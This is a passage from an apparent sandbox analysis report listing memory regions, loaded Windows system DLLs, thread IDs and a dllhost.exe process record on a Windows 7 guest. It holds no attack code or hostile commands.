0x7fefb610000 end_va = 0x7fefb627fff entry_point = 0x7fefb611130 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 2163 start_va = 0x7fefb630000 end_va = 0x7fefb67afff entry_point = 0x7fefb630000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 2164 start_va = 0x7fefb680000 end_va = 0x7fefb68afff entry_point = 0x7fefb680000 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 2165 start_va = 0x7fefb690000 end_va = 0x7fefb6cafff entry_point = 0x7fefb690000 region_type = mapped_file name = "sndvolsso.dll" filename = "\\Windows\\System32\\SndVolSSO.dll" (normalized: "c:\\windows\\system32\\sndvolsso.dll") Region: id = 2166 start_va = 0x7fefb6d0000 end_va = 0x7fefb712fff entry_point = 0x7fefb6d0000 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll") Region: id = 2167 start_va = 0x7fefb720000 end_va = 0x7fefb811fff entry_point = 0x7fefb720000 region_type = mapped_file name = "dui70.dll" filename = "\\Windows\\System32\\dui70.dll" (normalized: "c:\\windows\\system32\\dui70.dll") Region: id = 2168 start_va = 0x7fefb820000 end_va = 0x7fefba34fff entry_point = 0x7fefb9f64b0 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\gdiplus.dll") Region: id = 2169 start_va = 0x7fefba40000 end_va = 0x7fefba95fff entry_point = 0x7fefba4bbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 2170 start_va = 0x7fefbaa0000 end_va = 0x7fefbbcbfff entry_point = 0x7fefbaa94bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2171 start_va = 0x7fefbbd0000 end_va = 0x7fefbbecfff entry_point = 0x7fefbbd0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 2172 start_va = 0x7fefbbf0000 end_va = 0x7fefbde3fff entry_point = 0x7fefbd7c924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 2173 start_va = 0x7fefbdf0000 end_va = 0x7fefbef8fff entry_point = 0x7fefbdf0000 region_type = mapped_file name = "cryptui.dll" filename = "\\Windows\\System32\\cryptui.dll" (normalized: "c:\\windows\\system32\\cryptui.dll") Region: id = 2174 start_va = 0x7fefbf00000 end_va = 0x7fefc0d9fff entry_point = 0x7fefbf00000 region_type = mapped_file name = "authui.dll" filename = "\\Windows\\System32\\authui.dll" (normalized: "c:\\windows\\system32\\authui.dll") Region: id = 2175 start_va = 0x7fefc0e0000 end_va = 0x7fefc10cfff entry_point = 0x7fefc0e1010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 2176 start_va = 0x7fefc110000 end_va = 0x7fefc133fff entry_point = 0x7fefc110000 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 2177 start_va = 0x7fefc2e0000 end_va = 0x7fefc2ebfff entry_point = 0x7fefc2e1064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 2178 start_va = 0x7fefc4c0000 end_va = 0x7fefc4ddfff entry_point = 0x7fefc4c13b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 2179 start_va = 0x7fefc610000 end_va = 0x7fefc619fff entry_point = 0x7fefc613cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 2180 start_va = 0x7fefc710000 end_va = 0x7fefc756fff entry_point = 0x7fefc711064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2181 start_va = 0x7fefca10000 end_va = 0x7fefca26fff entry_point = 0x7fefca132b8 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2182 start_va = 0x7fefcc00000 end_va = 0x7fefcc6cfff entry_point = 0x7fefcc01010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 2183 start_va = 0x7fefcf10000 end_va = 0x7fefcf32fff entry_point = 0x7fefcf11198 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 2184 start_va = 0x7fefcfb0000 end_va = 0x7fefcfbafff entry_point = 0x7fefcfb1030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 2185 start_va = 0x7fefcfe0000 end_va = 0x7fefd004fff entry_point = 0x7fefcfe9658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2186 start_va = 0x7fefd010000 end_va = 0x7fefd01efff entry_point = 0x7fefd011010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2187 start_va = 0x7fefd020000 end_va = 0x7fefd0b0fff entry_point = 0x7fefd021440 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 2188 start_va = 0x7fefd0c0000 end_va = 0x7fefd0fcfff entry_point = 0x7fefd0c18f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2189 start_va = 0x7fefd100000 end_va = 0x7fefd113fff entry_point = 0x7fefd1010e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 2190 start_va = 0x7fefd120000 end_va = 0x7fefd12efff entry_point = 0x7fefd1219b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2191 start_va = 0x7fefd1c0000 end_va = 0x7fefd1cefff entry_point = 0x7fefd1c1020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2192 start_va = 0x7fefd270000 end_va = 0x7fefd2a5fff entry_point = 0x7fefd271474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2193 start_va = 0x7fefd2b0000 end_va = 0x7fefd31afff entry_point = 0x7fefd2b30e0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2194 start_va = 0x7fefd320000 end_va = 0x7fefd486fff entry_point = 0x7fefd3210c0 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2195 start_va = 0x7fefd490000 end_va = 0x7fefd4a9fff entry_point = 0x7fefd491558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 2196 start_va = 0x7fefd4b0000 end_va = 0x7fefd4e9fff entry_point = 0x7fefd4b1320 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 2197 start_va = 0x7fefd4f0000 end_va = 0x7fefd541fff entry_point = 0x7fefd4f10d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 2198 start_va = 0x7fefd550000 end_va = 0x7fefd618fff entry_point = 0x7fefd5ca874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2199 start_va = 0x7fefd620000 end_va = 0x7fefd6f6fff entry_point = 0x7fefd623274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2200 start_va = 0x7fefd700000 end_va = 0x7fefd7dafff entry_point = 0x7fefd720760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2201 start_va = 0x7fefd7e0000 end_va = 0x7fefd957fff entry_point = 0x7fefd7e10e0 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 2202 start_va = 0x7fefd980000 end_va = 0x7fefdb56fff entry_point = 0x7fefd981010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 2203 start_va = 0x7fefdb60000 end_va = 0x7fefdbacfff entry_point = 0x7fefdb61070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2204 start_va = 0x7fefdbb0000 end_va = 0x7fefdbddfff entry_point = 0x7fefdbb1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2205 start_va = 0x7fefdbe0000 end_va = 0x7fefde38fff entry_point = 0x7fefdbe1340 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 2206 start_va = 0x7fefde40000 end_va = 0x7fefe042fff entry_point = 0x7fefde63330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2207 start_va = 0x7fefe0f0000 end_va = 0x7fefe219fff entry_point = 0x7fefe0f10d4 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 2208 start_va = 0x7fefe220000 end_va = 0x7fefe2b8fff entry_point = 0x7fefe221c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2209 start_va = 0x7fefe2c0000 end_va = 0x7fefe2defff entry_point = 0x7fefe2c60e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2210 start_va = 0x7fefe2e0000 end_va = 0x7fefe3e8fff entry_point = 0x7fefe2e1064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2211 start_va = 0x7fefe3f0000 end_va = 0x7fefe51cfff entry_point = 0x7fefe43ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2212 start_va = 0x7fefe520000 end_va = 0x7fefe5befff entry_point = 0x7fefe5225a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2213 start_va = 0x7fefe5c0000 end_va = 0x7fefe5c7fff entry_point = 0x7fefe5c1504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2214 start_va = 0x7fefe5d0000 end_va = 0x7fefe636fff entry_point = 0x7fefe5db03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2215 start_va = 0x7fefe640000 end_va = 0x7fefe64dfff entry_point = 0x7fefe641080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2216 start_va = 0x7fefe6d0000 end_va = 0x7fefe740fff entry_point = 0x7fefe6e1e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2217 start_va = 0x7fefe750000 end_va = 0x7feff4d7fff entry_point = 0x7fefe7ccebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2218 start_va = 0x7feff4f0000 end_va = 0x7feff4f0fff entry_point = 0x7feff4f0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2219 start_va = 0x7fffff7a000 end_va = 0x7fffff7bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff7a000" filename = "" Region: id = 2220 start_va = 0x7fffff7c000 end_va = 0x7fffff7dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff7c000" filename = "" Region: id = 2221 start_va = 0x7fffff7e000 end_va = 0x7fffff7ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff7e000" filename = "" Region: id = 2222 start_va = 0x7fffff82000 end_va = 0x7fffff83fff entry_point = 0x0 region_type = private name = "private_0x000007fffff82000" filename = "" Region: id = 2223 start_va = 0x7fffff86000 end_va = 0x7fffff87fff entry_point = 0x0 region_type = private name = "private_0x000007fffff86000" filename = "" Region: id = 2224 start_va = 0x7fffff88000 end_va = 0x7fffff89fff entry_point = 0x0 region_type = private name = "private_0x000007fffff88000" filename = "" Region: id = 2225 start_va = 0x7fffff8a000 end_va = 0x7fffff8bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff8a000" filename = "" Region: id = 2226 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 2227 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 2228 start_va = 0x7fffff92000 end_va = 0x7fffff93fff entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 2229 start_va = 0x7fffff94000 end_va = 0x7fffff95fff entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 2230 start_va = 0x7fffff96000 end_va = 0x7fffff97fff entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 2231 start_va = 0x7fffff98000 end_va = 0x7fffff99fff entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 2232 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 2233 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 2234 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 2235 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 2236 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 2237 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 2238 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 2239 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 2240 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 2241 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2242 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 2243 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 2244 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 2245 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 2246 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 2247 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Thread: id = 121 os_tid = 0xb94 Thread: id = 122 os_tid = 0x4a4 Thread: id = 123 os_tid = 0x6fc Thread: id = 124 os_tid = 0x320 Thread: id = 125 os_tid = 0x324 Thread: id = 126 os_tid = 0x45c Thread: id = 127 os_tid = 0x334 Thread: id = 128 os_tid = 0x338 Thread: id = 129 os_tid = 0x33c Thread: id = 130 os_tid = 0x114 Thread: id = 131 os_tid = 0x7d0 Thread: id = 132 os_tid = 0x4b0 Thread: id = 133 os_tid = 0x46c Thread: id = 134 os_tid = 0x440 Thread: id = 135 os_tid = 0x734 Thread: id = 136 os_tid = 0x700 Thread: id = 137 os_tid = 0x6b4 Thread: id = 138 os_tid = 0x6b0 Thread: id = 139 os_tid = 0x6ac Thread: id = 140 os_tid = 0x690 Thread: id = 141 os_tid = 0x68c Thread: id = 142 os_tid = 0x688 Thread: id = 143 os_tid = 0x684 Thread: id = 144 os_tid = 0x65c Thread: id = 145 os_tid = 0x5d4 Thread: id = 146 os_tid = 0x5d0 Thread: id = 147 os_tid = 0x5c8 Thread: id = 148 os_tid = 0x5c4 Thread: id = 149 os_tid = 0x5c0 Thread: id = 150 os_tid = 0x588 Thread: id = 151 os_tid = 0x580 Thread: id = 164 os_tid = 0x7a4 Process: id = "11" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x64293000" os_pid = "0x508" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "10" os_parent_pid = "0x57c" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010cdc" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2353 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2354 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2355 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2356 start_va = 0x40000 end_va = 0xa6fff entry_point = 0x40000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2357 start_va = 0xb0000 end_va = 0xb0fff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 2358 start_va = 0xc0000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 2359 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 2360 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 2361 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 2362 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 2363 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 2364 start_va = 0x4c0000 end_va = 0x647fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2365 start_va = 0x650000 end_va = 0x7d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2366 start_va = 0x7e0000 end_va = 0x1bdffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 2367 start_va = 0x1be0000 end_va = 0x1cbefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001be0000" filename = "" Region: id = 2368 start_va = 0x1ce0000 end_va = 0x1ddffff entry_point = 0x0 region_type = private name = "private_0x0000000001ce0000" filename = "" Region: id = 2369 start_va = 0x1e80000 end_va = 0x1efffff entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 2370 start_va = 0x1f10000 end_va = 0x200ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f10000" filename = "" Region: id = 2371 start_va = 0x2010000 end_va = 0x22defff entry_point = 0x2010000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2372 start_va = 0x22f0000 end_va = 0x23effff entry_point = 0x0 region_type = private name = "private_0x00000000022f0000" filename = "" Region: id = 2373 start_va = 0x24c0000 end_va = 0x25bffff entry_point = 0x0 region_type = private name = "private_0x00000000024c0000" filename = "" Region: id = 2374 start_va = 0x2670000 end_va = 0x276ffff entry_point = 0x0 region_type = private name = "private_0x0000000002670000" filename = "" Region: id = 2375 start_va = 0x2770000 end_va = 0x286ffff entry_point = 0x0 region_type = private name = "private_0x0000000002770000" filename = "" Region: id = 2376 start_va = 0x28e0000 end_va = 0x28effff entry_point = 0x0 region_type = private name = "private_0x00000000028e0000" filename = "" Region: id = 2377 start_va = 0x76fb0000 end_va = 0x770a9fff entry_point = 0x76fca2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2378 start_va = 0x770b0000 end_va = 0x771cefff entry_point = 0x770c5ea0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2379 start_va = 0x771d0000 end_va = 0x77378fff entry_point = 0x771d0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2380 start_va = 0x773a0000 end_va = 0x773a6fff entry_point = 0x773a106c region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 2381 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2382 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2383 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2384 start_va = 0xff6a0000 end_va = 0xff6a6fff entry_point = 0xff6a0000 region_type = mapped_file name = "dllhost.exe" filename = "\\Windows\\System32\\dllhost.exe" (normalized: "c:\\windows\\system32\\dllhost.exe") Region: id = 2385 start_va = 0x7fee1b60000 end_va = 0x7fee1bfffff entry_point = 0x7fee1b60000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll") Region: id = 2386 start_va = 0x7fef3a60000 end_va = 0x7fef3a7efff entry_point = 0x7fef3a657b8 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll") Region: id = 2387 start_va = 0x7fefba40000 end_va = 0x7fefba95fff entry_point = 0x7fefba4bbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 2388 start_va = 0x7fefbaa0000 end_va = 0x7fefbbcbfff entry_point = 0x7fefbaa94bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2389 start_va = 0x7fefc710000 end_va = 0x7fefc756fff entry_point = 0x7fefc711064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2390 start_va = 0x7fefca10000 end_va = 0x7fefca26fff entry_point = 0x7fefca132b8 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2391 start_va = 0x7fefd010000 end_va = 0x7fefd01efff entry_point = 0x7fefd011010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2392 start_va = 0x7fefd100000 end_va = 0x7fefd113fff entry_point = 0x7fefd1010e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 2393 start_va = 0x7fefd2b0000 end_va = 0x7fefd31afff entry_point = 0x7fefd2b30e0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2394 start_va = 0x7fefd550000 end_va = 0x7fefd618fff entry_point = 0x7fefd5ca874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2395 start_va = 0x7fefd620000 end_va = 0x7fefd6f6fff entry_point = 0x7fefd623274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2396 start_va = 0x7fefd700000 end_va = 0x7fefd7dafff entry_point = 0x7fefd720760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2397 start_va = 0x7fefdbb0000 end_va = 0x7fefdbddfff entry_point = 0x7fefdbb1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2398 start_va = 0x7fefde40000 end_va = 0x7fefe042fff entry_point = 0x7fefde63330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2399 start_va = 0x7fefe220000 end_va = 0x7fefe2b8fff entry_point = 